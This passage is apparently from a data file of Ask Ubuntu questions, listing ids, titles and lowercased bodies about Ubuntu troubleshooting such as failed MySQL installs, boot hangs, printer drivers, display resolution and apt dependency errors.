< mru 1024 > < magic 0xae51a48 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : rcvd [ lcp confack id=0x1 < mru 1024 > < magic 0xae51a48 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : rcvd [ ipcp confreq id=0x1 < addr 58.185.224.226 > < ms-dns1 0.0.0.0 > < ms-dns2 0.0.0.0 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : discarded non-lcp packet when lcp not open mar 28 12:08:53 thinkpad pppd [ 15064 ] : rcvd [ lcp protrej id=0x2 80 fd 01 01 00 0f 1a 04 78 00 18 04 78 00 15 03 2f 00 00 ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : rcvd [ lcp confreq id=0x3 < magic 0x2393d7b8 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : sent [ lcp confack id=0x3 < magic 0x2393d7b8 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : rcvd [ ipcp confrej id=0x1 < compress vj 0f 01 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : discarded non-lcp packet when lcp not open mar 28 12:08:53 thinkpad pppd [ 15064 ] : rcvd [ lcp confack id=0x2 < mru 1024 > < magic 0x6b7efcd0 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : sent [ ccp confreq id=0x2 < deflate 15 > < deflate ( old # ) 15 > < bsd v1 15 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : sent [ ipcp confreq id=0x2 < compress vj 0f 01 > < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns2 0.0.0.0 > ] mar 28 12:08:56 thinkpad pppd [ 15064 ] : sent [ ccp confreq id=0x2 < deflate 15 > < deflate ( old # ) 15 > < bsd v1 15 > ] mar 28 12:08:56 thinkpad pppd [ 15064 ] : sent [ ipcp confreq id=0x2 < compress vj 0f 01 > < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns2 0.0.0.0 > ] mar 28 12:08:59 thinkpad pppd [ 15064 ] : sent [ ccp confreq id=0x2 < deflate 15 > < deflate ( old # ) 15 > < bsd v1 15 > ] mar 28 12:08:59 thinkpad pppd [ 15064 ] : sent [ ipcp confreq id=0x2 < compress vj 0f 01 > < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns2 0.0.0.0 > ] mar 28 12:09:02 thinkpad pppd [ 15064 ] : sent [ ccp confreq id=0x2 < deflate 15 > < deflate ( old # ) 15 > < bsd v1 15 > ] mar 28 12:09:02 thinkpad pppd [ 15064 ] : sent [ ipcp confreq id=0x2 < compress vj 0f 01 > < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns2 0.0.0.0 > ] mar 28 12:09:05 thinkpad pppd [ 15064 ] : sent [ ccp confreq id=0x2 < deflate 15 > < deflate ( old # ) 15 > < bsd v1 15 > ] mar 28 12:09:05 thinkpad pppd [ 15064 ] : sent [ ipcp confreq id=0x2 < compress vj 0f 01 > < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns2 0.0.0.0 > ] mar 28 12:09:08 thinkpad pppd [ 15064 ] : sent [ ccp confreq id=0x2 < deflate 15 > < deflate ( old # ) 15 > < bsd v1 15 > ] mar 28 12:09:08 thinkpad pppd [ 15064 ] : sent [ ipcp confreq id=0x2 < compress vj 0f 01 > < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns2 0.0.0.0 > ] mar 28 12:09:11 thinkpad pppd [ 15064 ] : sent [ ccp confreq id=0x2 < deflate 15 > < deflate ( old # ) 15 > < bsd v1 15 > ] mar 28 12:09:11 thinkpad pppd [ 15064 ] : sent [ ipcp confreq id=0x2 < compress vj 0f 01 > < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns2 0.0.0.0 > ] mar 28 12:09:14 thinkpad pppd [ 15064 ] : sent [ ccp confreq id=0x2 < deflate 15 > < deflate ( old # ) 15 > < bsd v1 15 > ] mar 28 12:09:14 thinkpad pppd [ 15064 ] : sent [ ipcp confreq id=0x2 < compress vj 0f 01 > < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns2 0.0.0.0 > ] mar 28 12:09:17 thinkpad pppd [ 15064 ] : sent [ ccp confreq id=0x2 < deflate 15 > < deflate ( old # ) 15 > < bsd v1 15 > ] mar 28 12:09:17 thinkpad pppd [ 15064 ] : sent [ ipcp confreq id=0x2 < compress vj 0f 01 > < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns2 0.0.0.0 > ] mar 28 12:09:20 thinkpad pppd [ 15064 ] : sent [ ccp confreq id=0x2 < deflate 15 > < deflate ( old # ) 15 > < bsd v1 15 > ] mar 28 12:09:20 thinkpad pppd [ 15064 ] : sent [ ipcp confreq id=0x2 < compress vj 0f 01 > < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns2 0.0.0.0 > ] mar 28 12:09:23 thinkpad pppd [ 15064 ] : ccp : timeout sending config-requests mar 28 12:09:23 thinkpad pppd [ 15064 ] : ipcp : timeout sending config-requests mar 28 12:09:23 thinkpad pppd [ 15064 ] : sent [ lcp termreq id=0x3 `` no network protocols running '' ] mar 28 12:09:26 thinkpad pppd [ 15064 ] : sent [ lcp termreq id=0x4 `` no network protocols running '' ] mar 28 12:09:29 thinkpad pppd [ 15064 ] : connection terminated . mar 28 12:09:29 thinkpad networkmanager [ 1368 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) mar 28 12:09:29 thinkpad pppd [ 15064 ] : modem hangup mar 28 12:09:29 thinkpad pppd [ 15064 ] : exit .
274422	how to i resolve this error after trying to install mysql on ubuntu desktop 12.04 ?	i am getting the following error when trying to install mysql-server on ubuntu 12.04 sudo apt-get install mysql-server reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : python-libuser linux-headers-3.2.0-27 libqtwebkit4 python-central libuser1 linux-headers-3.2.0-27-generic-pae use 'apt-get autoremove ' to remove them . the following extra packages will be installed : mysql-server-5.5 suggested packages : tinyca the following new packages will be installed mysql-server mysql-server-5.5 0 upgraded , 2 newly installed , 0 to remove and 125 not upgraded . need to get 0 b/8,737 kb of archives . after this operation , 31.4 mb of additional disk space will be used . do you want to continue [ y/n ] ? y preconfiguring packages ... selecting previously unselected package mysql-server-5.5 . ( reading database ... 312756 files and directories currently installed . ) unpacking mysql-server-5.5 ( from ... /mysql-server-5.5_5.5.29-0ubuntu0.12.04.2_i386.deb ) ... selecting previously unselected package mysql-server . unpacking mysql-server ( from ... /mysql-server_5.5.29-0ubuntu0.12.04.2_all.deb ) ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for man-db ... setting up mysql-server-5.5 ( 5.5.29-0ubuntu0.12.04.2 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates it 's a follow-up error from a previous failure . errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 )
274423	ubuntu 12.04 gui does not start on boot , hangs on purple loading screen with ubuntu logo and five dots	it started like this : i wanted to install adobe reader ( .bin file ) via terminal . after i created a folder for installation files and started the whole process i suddenly realized that i do n't even have enough disk space . after few seconds the system became very slow , so i closed the running applications and hit reboot . well , after rebooting i faced the problem i wrote in the title . no response for hitting esc button , but ctrl+alt+f1 worked , so i rebooted again and switched to recovery mode , where i used dpkg and clean , even went to root and deleted a couple of files , for example the adobe reader install file and the folder installation files , because i thought after making some space on my hdd and rebooting , there will be no problems . well , it did not work . after this i tried to remove all unused kernel headers images , modules with the same exact blue code in this article : http : //ubuntugenius.wordpress.com/2011/01/08/ubuntu-cleanup-how-to-remove-all-unused-linux-kernel-headers-images-and-modules/ after reboot , the same . then i prepared a usb live boot `` cd '' for ubuntu 12.04 and booted with that . in that gui i decided to run boot-repair , followed the instructions and got this report : http : //paste.ubuntu.com/5654068/ the problem is still the same as indicated in the title . i do n't know if the problem is really with the boot itself or something else , but i really appreciate any help ! this is the only operation system i use on this notebook and it worked without boot problems since 6 months . thank you guys in advance !
274426	how do i get a canon imagerunner advance c2020i working ?	using the default driver in ubuntu 12.04 for the canon imagerunner advance c2020i ( or ir adv c2020i ) results in black and white only printing . using the drivers on the canon website prints dummy text or does n't do anything . i tried different drivers , models and uri ( socket and lpd ) and it did not resolve the problem . the printer is hence unusable for color printing .
274429	custom display settings with lubuntu ?	i am having a hard time with this hp mini 210 1000 netbook . the screen just stretched out all of a sudden , forcing a resolution ( 1024x768 ) which is higher than the display 's actual resolution ( 1024x600 ) . this means that the bottm ~25 % of the screen can not be seen on the laptop 's display , however it works fine on an external vga one . when force setting the resolution back to normal under windows 7 , it just streched the screen even further . however , after a bit of experimenting , i managed to force the resolution to stay without stretching on lubuntu . i used the xrandr -- output lvds1 -- fb 1024x600 command , and it set the resolution so that i can see everything on the screen . however , i am still faced with two problems : this wo n't stay following a reboot , and i various os bits go off screen below the visible section ( menus , apps , etc ) . i tried to force the resolution by placing the command into the /etc/rc.local script , however it did not seem to work . i also played around with creating new modes , and using the panning and pos options , however i was n't able to achieve much . any ideas ? i 've been battling this for weeks ! edit : although now the resolution remains the same after a reboot , menu items still go offscreen . not the same as that other 'duplicate ' question .
274435	ca n't login to my user account	this solution does n't work . i 'm using guest account right now . i was just working on virtualbox and listening to some music with rhythmbox when suddenly my computer became laggy , and seconds later , everything disappeared except my cursor and wallpaper . i ran terminal using ctrl+alt+t and typed startx , sudo startx , and the last one sudo shutdown -h now . after booting up my computer again i could not login to my user account , after typing my password and hitting enter , black screen for 2 seconds , and login screen again .
274436	font corruption in firefox	characters are periodically not displayed correctly on some websites in firefox . an example is http : //askubuntu.com/questions/ask where the 'w ' in the title `` how to format '' gets displayed as an obscure version of '6 ' , and the 'f ' gets displayed as an obscure version of 'c ' . chromium is fine . i 'm using intel integrated graphics , and ubuntu 12.10 .
274441	pg_connect ( ) : unable to connect to postgresql server	i have read multiple articles detailing this fix for this exact issue . i have tried all kinds of variations of editing the pg_hba.conf file but no luck i still get the following error in my apache log when i attempt to run the php program i 'm trying to use . thu mar 28 08:20:21 2013 ] [ error ] [ client 172.16.1.64 ] php warning : pg_connect ( ) : > unable to connect to postgresql server : fatal : peer authentication failed for user this is my current pg_hba.conf file : i do n't know what else to try , any help is greatly appreciated ! thanks !
274442	how do i run executable scripts in nautilus rather than open them in gedit text editor ?	when i double-click on a script in nautilus in order to run it , the script opens in my text editor with no option to do so . using nautilus , how do i run executable text files and/or scripts ?
274444	error while update process	each time when i try to update ubuntu by sudo apt-get update it fetches data from archive , but after reading package list i get this error : w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main amd64 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-amd64_packages ) w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main i386 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-i386_packages ) w : you may want to run apt-get update to correct these problems how can i solve this problem ? thank you : )
274446	dual boot setup	i downloaded ubuntu windows installer and when i chose to boot into ubuntu i just get command line without any gui . i downloaded ubuntu so i obviously want the gui desktop . but i do n't know why i just get a command line .
274452	limited access accounts for a low maintenance deployment ?	forgive me if i have n't done quite as much digging trying to solve this on my own as i could have : i 'm currently in zambia , and my internet access is unpredictible and slow when it 's working . i 'm working with a small school , trying to set up some hardware and a basic it policy that will let their non-power-user staff keep their machines working efficiently for as long as possible . i am not a sys-admin . i use osx in most of my own computing , but i 'm comfortable with the shell and kind of know what i 'm doing . the computers are laptops , which will be available for checkout by both students and faculty . basically , i want to have two user accounts , 'student ' and 'teacher ' . i want both of these accounts to have the following restrictions : no write access outside of ~/ no modification of system preferences no modification of menus or appearance of the desktop no adding or removing packages and possibly : no way of running downloaded / new executables ? anything else you smart people can think of that would make this a more painless experience ? i want users to be able to save files , but i want a fairly painless way for saved data to be regularly wiped . i 'm not sure if it would be easier to have somebody use a clonezilla thumbdrive to restore the computers , or if it would be easier to just have someone log in to the admin account and delete / recreate the user accounts ? could i achieve this last task with a shell script and cron ? thanks for your time , and i apologize if i 'm overdoing the shotgun approach .
274453	how can i cancel all the current communication from particular ip in ubuntu 12.04 ?	i am working on ubuntu 12.04 firewall . i want to deny any ip on runtime . i am using `` ufw deny from ip '' . it 's working for future connections . but it is not cancelling the existing connections like ssh . how can i cancel all the current communication from particular ip ? regards ,
274461	bash escape from script	i have a simple app launcher script used to open a few apps in a ceratain folder on a certain workspace : # ! /bin/bash if [ [ -n `` $ 2 '' ] ] then wmctrl -s $ 2 fi terminator -- working-directory= $ 1 & subl $ 1 & smartgithg.sh $ 1 & chromium-browser & when i run it : petr @ sova : ~ $ open_project work/dyme/ 4 petr @ sova : ~ $ # # # # some message or whatever # # # # the console hangs here , and i need to < ctrl > +c in order to use it again how do i `` escape '' from the command and maintain a regular console prompt .
274462	ubuntu software center installation ?	hello i am new to ubuntu and i have been trying to download wine , mp3 media players readers , and vlc . however every single time i try to download something this message pops p and closes the download it is really ennoying as ubuntu is useless without this working properly = ( here is the message : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.5-0ubuntu0.12.10.1 ) but 2.0.5-0ubuntu0.12.10.1 is to be installed depends : libavcodec-extra-53 ( > = 6:0.8.4 ) but 6:0.8.5ubuntu0.12.10.1 is to be installed depends : libavutil-extra-51 ( > = 6:0.8.4 ) but 6:0.8.5ubuntu0.12.10.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu20.1 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.10-0ubuntu1.1 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.7.2-2ubuntu1 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not going to be installed depends : libstdc++6 ( > = 4.6 ) but 4.7.2-2ubuntu1 is to be installed depends : libtar0 but it is not going to be installed depends : libxcb-keysyms1 ( > = 0.3.9 ) but it is not going to be installed depends : zlib1g ( > = 1:1.2.3.3 ) but 1:1.2.7.dfsg-13 is to be installed i really need help plz
274467	open file with terminal and close terminal afterwards	i want to open a file using the terminal on ubuntu . to have it independent from the terminal , i use gnome-open : gnome-open text.pdf and since i 'm lazy , i also have this alias in my .bashrc : alias g='gnome-open' so when i type g text.pdf the file opens in evince but here is my problem : the terminal is still open ! i often do n't need the terminal at that moment and since i 'm using a tiling window manager it 's wasting space so i close it manually which is annoying . is there a way to automatically close the terminal after the file was opened ?
274471	cross-compiler for darwin x ?	is there a way to cross compile for mac os x and ios on ubuntu ? i found mingw-w64 packages and they work well for windows and it seems i can cross compile for android as well with gcc-arm-linux packages but i could n't find an equivalent for darwin x. i understand there might be some legal issues when dealing with apple , but fedora has cross compiler for darwin x so i 'm not sure .
274478	how to create an ubuntu bootable usb drive in mac os x ?	i have a macbook pro8.1 and i would very much like to have a dual boot system on it . i prefer the usb media installation method , as it 's the only option i have at the moment . i 've followed the instructions here : http : //www.ubuntu.com/download/help/create-a-usb-stick-on-mac-osx these are the terminal commands that i have used : hdiutil convert -format udrw -o ~/desktop/ubuntu-12.10-desktop-amd64+mac.img ~/desktop/ubuntu-12.10-desktop-amd64+mac.iso sudo dd if=/users/sary/desktop/ubuntu-12.10-desktop-amd64+mac.img of=/dev/rdisk2 bs=1m this is my setup : installed refind http : //www.rodsbooks.com/refind/getting.html formatted the usb in `` disk utility `` : selected '1 partition ' and 'macos extended ( journaled ) ' . partitioned the usb as : guid partition table ( gpt ) this is the iso img that i used : ubuntu 12.10 amd64+mac version `` ubuntu-12.10-desktop-amd64+mac.img `` . after a shutdown , refind shows up and it 's working properly . but , when i select the usb media drive it leads to a black screen that reads `` non-system disk `` . i would like to know what exactly i am doing wrong , or missing , here ? should the usb format be in `` mac os extended ( jounrnaled ) '' , `` ms-dos ( fat ) '' or `` exfat '' ? should it have 1 or 2 partition layout ? if it must be formatted as mac os extended ( journaled ) , does it mean the partition scheme should be set to `` gpt '' or `` mbr '' to have an ubuntu bootable usb drive ? thanks .
274480	not all emails are coming into thunderbird from gmail	can anyone offer some insight as to why only some of my emails are being pulled into thunderbird from gmail ? i noticed that my tbird does n't have a junk mail folder set up in it - could this be the problem ? the mail that 's missing is standard inbox stuff in gmail ...
274484	printer canon pixma mg5200 configured but not working	i know there are tons of forums out there helping to configure this specific printer but none of them seem to help me . i 've managed to configured my printer . it appears on `` localhost:631 '' description : canon pixma mg5200 location : 192.168.1.60 driver : canon pixma mg5200 - cups+gutenprint v5.2.9 ( color , 2-sided printing ) connection : lpd : //192.168.1.60 defaults : job-sheets=none , none media=iso_a4_210x297mm sides=one-sided but when i try to print a testpage state switches to : `` held since `` if you need any more information just ask . i will provide them as far as i 'm capable of ( pretty new to ubuntu ) .
274486	making the touchpad work	no i am not a n00b ... my touchpad is working , but i have run ubuntu and several other linux ( centos , fedora , etc ) over several different laptop configurations ( hp , samsung , dell ... ) and each and every time , i find getting a laptop touchpad to work is like voodoo black magic . you have to google for hours to find all the right tweaks to often times make it work . even then , after you shake your ju-ju sticks and sacrifice a few virgins ( as is the case with my current samsung ) , you still may end up with a touchpad that you `` prefer '' using a mouse to the touchpad over because it is too sensitive or un-sensitive . at the same time , i have run windows , and have had macs and it seems like the touchpad experience with those machines is not as brittle as it is on linux . so the purpose of this post is ask if there is a desire to aggregate into a single point of reference all of the tweaks ( or maybe it exist ) to make touchpads work in linux/ubuntu , and second how can we get touchpads being `` cadillac '' on ubuntu so that the experience is fully equal to any other os ?
274491	is it possible to rename keyboard layouts as they appear in xfce panel list ?	i use four different keyboard layouts and three of them look too similar ; it becomes confusing in practice . in fact , one of these ( ro_cedilla ) is almost identical to us english keyboard , with only a few special shortkeys for romanian special characters ( but which makes me prefer it to the normal english layout ) and i want it for writing in english and general use of the computer . i would like it to appear named as us , en , or something like that . can i edit the tray entry ro for this layout ? ( it is not clear to me what the 'edit ' command in the properties of the panel applet ( second image ) really does : when selecting an installed layout and clicking 'edit ' , it opens the options to add new layout , not to edit the one selected . )
274495	how to open the peerguardian interface ?	i am using peerguardian , with a graphical interface ( pglgui ) . when i start it , a window opens with details and configuration . if i close it , the software will keep running in the tray . i did not find any ways to bring the window back again . in the dropdown menu which appears when i click on the icon , there is no such option . so the only way i found is to close the program and start it again . any other possibilities ?
274500	python2.7 : not found : unable to install or remove any packages	i am currently unable to install any packages . at first it started with complaints that it could n't find /usr/bin/python ( not 100 % sure of the path here ) so i tried to re-install python using synaptic . the re-install failed as well . now , i can not access the side bar in unity and no keyboard short-cuts work . i can access chrome by right-clicking a file and selecting `` open with ... '' and access the command line using alt-ctrl-f # but that is about all . i did sudo apt-get install with the results : reading package lists ... building dependency tree ... reading state information ... you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : apturl : depends : gconf2 ( > = 2.28.1-2 ) gwibber : depends : libgwibber-gtk2 ( > = 3.1.4.1+r1119 ) but it is not installed depends : libgwibber2 ( > = 3.1.4.1 ) but it is not installed ibus : depends : gconf2 ( > = 2.28.1-2 ) libgksu2-0 : depends : gconf2 ( > = 2.28.1-2 ) update-manager : depends : gksu but it is not installed and sudo apt-get -f install with the results : reading package lists ... building dependency tree ... reading state information ... correcting dependencies ... done the following packages were automatically installed and are no longer required : libgtkspell0 liblaunchpad-integration1 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : gconf2 gksu gwibber gwibber-service language-selector-common language-selector-gnome libgwibber-gtk2 libgwibber2 suggested packages : gconf-defaults-service gwibber-service-flickr gwibber-service-digg gwibber-service-statusnet gwibber-service-foursquare gwibber-service-friendfeed gwibber-service-pingfm gwibber-service-qaiku unity-lens-gwibber recommended packages : gwibber-service-facebook gwibber-service-twitter gwibber-service-identica the following new packages will be installed : gconf2 gksu libgwibber-gtk2 libgwibber2 the following packages will be upgraded : gwibber gwibber-service language-selector-common language-selector-gnome 4 upgraded , 4 newly installed , 0 to remove and 5 not upgraded . 15 not fully installed or removed . need to get 0 b/866 kb of archives . after this operation , 1,281 kb of additional disk space will be used . do you want to continue [ y/n ] ? setting up python-minimal ( 2.7.3-0ubuntu2 ) ... /var/lib/dpkg/info/python-minimal.postinst : 4 : /var/lib/dpkg/info/python-minimal.postinst : python2.7 : not found dpkg : error processing python-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : python-minimal any help would be great . seems like i 'm 100 % screwed . i checked my /usr/bin directory : lrwxrwxrwx 1 nolando nolando 9 apr 17 2012 python - > python2.7 lrwxrwxrwx 1 nolando nolando 9 apr 17 2012 python2 - > python2.7 i am using using 12.04 .
274503	problem with gnome-tweak-tool	when i run gnome-tweak-tool after installation , the terminal shows this : warning : error detecting shell traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_shell_extensions.py '' , line 169 , in init shell = gnomeshellfactory ( ) .get_shell ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/utils.py '' , line 39 , in getinstance instances [ cls ] = cls ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 139 , in init proxy = _shellproxy ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 53 , in init result , output = self.proxy.eval ( ' ( s ) ' , js ) file `` /usr/lib/python2.7/dist-packages/gi/overrides/gio.py '' , line 164 , in call none ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 47 , in function return info.invoke ( *args , **kwargs ) gerror : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.shell was not provided by any .service files warning : schema /usr/share/glib-2.0/schemas/org.gnome.settings-daemon.peripherals.gschema.xml missing summary text : true warning : schema /usr/share/glib-2.0/schemas/org.gnome.settings-daemon.peripherals.gschema.xml missing summary text : true warning : schema /usr/share/glib-2.0/schemas/org.gnome.settings-daemon.peripherals.gschema.xml missing summary text : 0 warning : schema /usr/share/glib-2.0/schemas/org.gnome.settings-daemon.peripherals.gschema.xml missing summary text : 'on' possible values are `` on '' , `` off '' , and `` custom '' . warning : schema /usr/share/glib-2.0/schemas/org.gnome.settings-daemon.peripherals.gschema.xml missing summary text : 400 warning : schema /usr/share/glib-2.0/schemas/org.gnome.settings-daemon.peripherals.gschema.xml missing summary text : 100 info : missing gsettings org.gnome.settings-daemon.peripherals.keyboard ( key input-sources-switcher ) warning : shell not running traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_shell.py '' , line 60 , in init self._shell = gnomeshellfactory ( ) .get_shell ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/utils.py '' , line 39 , in getinstance instances [ cls ] = cls ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 139 , in init proxy = _shellproxy ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 53 , in init result , output = self.proxy.eval ( ' ( s ) ' , js ) file `` /usr/lib/python2.7/dist-packages/gi/overrides/gio.py '' , line 164 , in call none ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 47 , in function return info.invoke ( *args , **kwargs ) gerror : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.shell was not provided by any .service files warning : could not list shell extensions traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_shell.py '' , line 65 , in init extensions = self._shell.list_extensions ( ) attributeerror : shellthemetweak instance has no attribute '_shell' info : missing gsettings org.gnome.settings-daemon.plugins.power ( key lid-close-suspend-with-external-monitor ) ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed ( gnome-tweak-tool:2519 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0 ' failed how i can fix this ? i read a solution on this forum , about to force to 3.4 version but with synaptic is n't possible because i ca n't click on this feature .
274504	multimonitor in login screen vs. lock screen	i have a multiple monitor setup with two screens . the login screen uses dual monitor mode ( as seen on the first picture ) , but the lock screen ( ctrl + alt + l ) uses only a single monitor and disables the other ( as in the second image ) . is there a way to change that ? i want the lock screen to extend to both monitors , if possible . my os is ubuntu 12.04 . video card is `` nvidia corporation g98 [ geforce 8400 gs ] ( rev a1 ) '' , and system settings tab `` details '' shows `` driver '' as `` unknown '' . login screen using multi monitor mode : lock screen using only a single monitor :
274506	unofficial/local repositories and how do they differ from ppas in launchpad	i normally tend to use the ppas ( personal package archives ) found in launchpad.net , but i have noticed more and more that some repositories are being created in other places or a website that manages packages in a similar fashion like launchpad . so my questions are : what is an official repository and an unofficial one ( local repository ) , including the ones created outside of launchpad . how do repositories created outside of launchpad compare to the ones found inside of it in terms of first , security , followed by any other features that both offer . how do official software repositories differ from the ones created by 3rd party ppas in launchpad or outside of it .
274509	upgrade mysql through apt not effect ?	i am upgrading mysql-server and mysql-client my 12.04 using apt-get . seems the upgrade did n't take effect ? any thoughts why this happen ? i did reboot after upgrade . thanks . $ mysql -v mysql ver 14.14 distrib 5.5.22 , for debian-linux-gnu ( x86_64 ) using readline 6.2 $ mysqld -v mysqld ver 5.5.22-0ubuntu1 for debian-linux-gnu on x86_64 ( ( ubuntu ) ) $ sudo apt-cache policy mysql-server [ sudo ] password for dli : mysql-server : installed : 5.5.29-0ubuntu0.12.04.2 candidate : 5.5.29-0ubuntu0.12.04.2 version table : *** 5.5.29-0ubuntu0.12.04.2 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 100 /var/lib/dpkg/status 5.5.29-0ubuntu0.12.04.1 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-security/main amd64 packages 5.5.24-0ubuntu0.12.04.1 0 500 http : //os.cgs.wustl.edu/ubuntu/ precise-updates/main amd64 packages 500 http : //os.cgs.wustl.edu/ubuntu/ precise-security/main amd64 packages 5.5.22-0ubuntu1 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages 500 http : 